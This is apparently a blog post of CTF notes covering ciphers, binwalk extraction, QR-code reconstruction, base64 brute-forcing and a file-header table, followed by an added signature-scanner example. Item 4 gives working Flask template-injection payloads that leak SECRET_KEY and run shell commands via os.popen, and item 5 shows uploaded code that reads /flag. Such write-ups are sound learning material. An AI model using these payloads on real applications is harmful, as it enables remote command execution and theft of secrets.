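1. Rail fence cipher: CTF online tools - online rail fence cipher encryption | online rail fence cipher decryption | rail fence cipher algorithm | Railfence Cipher
It is somewhat like a substitution cipher.
2. Online image recognition tools can identify the location where a picture was taken.
3. The binwalk tool can be used to extract a hidden jpg file; the device information in the file's properties turned out to be a hexadecimal (hex) string.
binwalk -e <filename>
4. Flask template injection: flag={{config.SECRET_KEY}}
flag={{config.__class__.__init__.__globals__['os'].popen('ls ../').read()}} works like command execution; walk the directories to find app/flag.
5. File upload: directly upload a jpg file that contains Python code; the hint in the page source (F12) contains the flag.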
import os
os.system('cat /flag')
6. Building a QR code (reference: BugKu: 0和1的故事 (writeup), blog of 哇哈爱吃糖 on CSDN, bugku 0和1)
from PIL import Image

with open("1和0的故事.txt", "r") as f:
    data = [list(i.strip()) for i in f.readlines()]

# 7x7 finder pattern
flag = [
    [1, 1, 1, 1, 1, 1, 1],
    [1, 0, 0, 0, 0, 0, 1],
    [1, 0, 1, 1, 1, 0, 1],
    [1, 0, 1, 1, 1, 0, 1],
    [1, 0, 1, 1, 1, 0, 1],
    [1, 0, 0, 0, 0, 0, 1],
    [1, 1, 1, 1, 1, 1, 1]
]
img = Image.new("1", (25, 25))
# i is the row and j the column; putpixel takes (x, y) = (column, row).
# XOR with 1 because in mode "1" the value 0 is black and 1 is white.
for i in range(len(data)):
    for j in range(len(data[i])):
        # Top-left finder pattern
        if i < 7 and j < 7:
            img.putpixel((j, i), flag[i][j] ^ 1)
        # Bottom-left finder pattern
        elif i > 17 and j < 7:
            img.putpixel((j, i), flag[i-18][j] ^ 1)
        # Top-right finder pattern
        elif i < 7 and j > 17:
            img.putpixel((j, i), flag[i][j-18] ^ 1)
        else:
            img.putpixel((j, i), int(data[i][j]) ^ 1)
img.resize((500, 500)).show()
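7. Miscopied characters
Below is a small program I wrote. Running it base64-decodes the candidates and prints the resulting characters, which are then pieced together. The string is split into groups of 4 characters for decoding, and the groups are separated by divider lines.
import math, base64

corpt = "QWIHBLGZZXJSXZNVBZW"

# The base64 string is split into groups of 4 characters
# Pair every element of one list with every element of the other
def twoTo(list1, list2):
    result = []
    for i in list1:
        for j in list2:
            result.append(str(i) + str(j))
    return result

# Number of 4-character groups
length = math.ceil(len(corpt) / 4)
lcorpt = []
# Split the string
for i in range(length):
    lcorpt.append(corpt[i*4:i*4+4])
# Pad the last group with "="
if len(lcorpt[-1]) == 1:
    lcorpt[-1] = lcorpt[-1] + "=" * 3
elif len(lcorpt[-1]) == 2:
    lcorpt[-1] = lcorpt[-1] + "=" * 2
elif len(lcorpt[-1]) == 3:
    lcorpt[-1] = lcorpt[-1] + "=" * 1
else:
    print("perfect")
# Candidates for each character: upper case, lower case, and a look-alike digit
lalp = {"A": ["A", "a"], "B": ["B", "b"], "C": ["C", "c"], "D": ["D", "d"], "E": ["E", "e"],
        "F": ["F", "f"], "G": ["G", "g", 9], "H": ["H", "h"], "I": ["I", "i", 1], "J": ["J", "j"],
        "K": ["K", "k"], "L": ["L", "l"], "M": ["M", "m"], "N": ["N", "n"], "O": ["O", "o", 0],
        "P": ["P", "p"], "Q": ["Q", "q", 9], "R": ["R", "r"], "S": ["S", "s", 5], "T": ["T", "t"],
        "U": ["U", "u"], "V": ["V", "v"], "W": ["W", "w"], "X": ["X", "x"], "Y": ["Y", "y"], "Z": ["Z", "z", 2], "=": "="}
list1 = []
# Loop over the 4-character groups
for i in lcorpt:
    # Divider between groups
    print("====================")
    firstli = twoTo(lalp[i[0]], lalp[i[1]])
    secondli = twoTo(lalp[i[2]], lalp[i[3]])
    # Pair every first-half candidate with every second-half candidate
    for k in firstli:
        for m in secondli:
            try:
                flag = base64.urlsafe_b64decode(k + m).decode("utf-8")
                print(flag)
            except Exception as e:
                print("")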
8. base58: Base58 does not use the digit "0", the uppercase letter "O", the uppercase letter "I", the lowercase letter "l", or the "+" and "/" symbols.
binwalk is used to check the file type; Hex Fiend is used to view binary files such as images.
File types corresponding to hexadecimal file headers
The file headers of commonly used files are as follows:
JPEG (jpg), file header: FFD8FF
PNG (png), file header: 89504E47
GIF (gif), file header: 47494638
TIFF (tif), file header: 49492A00
Windows Bitmap (bmp), file header: 424D
CAD (dwg), file header: 41433130
Adobe Photoshop (psd), file header: 38425053
Rich Text Format (rtf), file header: 7B5C727466
XML (xml), file header: 3C3F786D6C
HTML (html), file header: 68746D6C3E
Email [thorough only] (eml), file header: 44656C69766572792D646174653A
Outlook Express (dbx), file header: CFAD12FEC5FD746F
Outlook (pst), file header: 2142444E
MS Word/Excel (xls.or.doc), file header: D0CF11E0
MS Access (mdb), file header: 5374616E64617264204A
WordPerfect (wpd), file header: FF575043
Postscript (eps.or.ps), file header: 252150532D41646F6265
Adobe Acrobat (pdf), file header: 255044462D312E
Quicken (qdf), file header: AC9EBD8F
Windows Password (pwl), file header: E3828596
ZIP Archive (zip), file header: 504B0304
RAR Archive (rar), file header: 52617221
Wave (wav), file header: 57415645
AVI (avi), file header: 41564920
Real Audio (ram), file header: 2E7261FD
Real Media (rm), file header: 2E524D46
MPEG (mpg), file header: 000001BA
MPEG (mpg), file header: 000001B3
Quicktime (mov), file header: 6D6F6F76
Windows Media (asf), file header: 3026B2758E66CF11
MIDI (mid), file header: 4D546864
————————————————
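Copyright notice: This is an original article by the CSDN blogger 「迷失蒲公英」, licensed under CC 4.0 BY-SA. When reposting, please include the link to the original source and this notice.
Original link: https://blog.csdn.net/qq_26721093/article/details/126685438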
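
The file-header table above is what a tool like binwalk matches against when it reports a hidden file inside an image (item 3). The following is an added example, not code from the original post: a minimal signature scanner that uses a subset of the headers listed above. The function names and the sample blob are constructed for illustration.

```python
# Added example (not from the original post): signature scan in the style of binwalk.
# Signatures come from the file-header table above; the sample blob is constructed.
SIGNATURES = {
    "jpg": "FFD8FF",
    "png": "89504E47",
    "gif": "47494638",
    "bmp": "424D",
    "pdf": "255044462D312E",
    "zip": "504B0304",
    "rar": "52617221",
}
MAGIC = {name: bytes.fromhex(h) for name, h in SIGNATURES.items()}


def scan(blob: bytes, min_len: int = 3):
    """Return sorted (offset, type) pairs for every signature found in blob.

    Signatures shorter than min_len bytes (e.g. bmp's 2-byte "BM") are only
    accepted at offset 0, because they match by chance inside arbitrary data.
    """
    hits = []
    for name, magic in MAGIC.items():
        start = blob.find(magic)
        while start != -1:
            if len(magic) >= min_len or start == 0:
                hits.append((start, name))
            start = blob.find(magic, start + 1)
    return sorted(hits)


def carve(blob: bytes, hits):
    """Split blob at each hit so every embedded file can be saved separately."""
    offsets = [off for off, _ in hits] + [len(blob)]
    return [(name, blob[off:offsets[i + 1]]) for i, (off, name) in enumerate(hits)]


def sample_blob() -> bytes:
    """Constructed input: a JPEG-like carrier with a ZIP appended after it."""
    jpeg = bytes.fromhex("FFD8FFE0") + b"\x00\x10JFIF\x00" + b"\x11" * 20 + bytes.fromhex("FFD9")
    zipped = bytes.fromhex("504B0304") + b"\x14\x00" + b"flag.txt" + b"\x22" * 10
    return jpeg + zipped


if __name__ == "__main__":
    blob = sample_blob()
    for offset, kind in scan(blob):
        print(f"{offset:#06x}  {kind}")
```

A second signature at a non-zero offset is the indicator that something has been appended to the carrier file, which is the same condition `binwalk -e` acts on when it extracts.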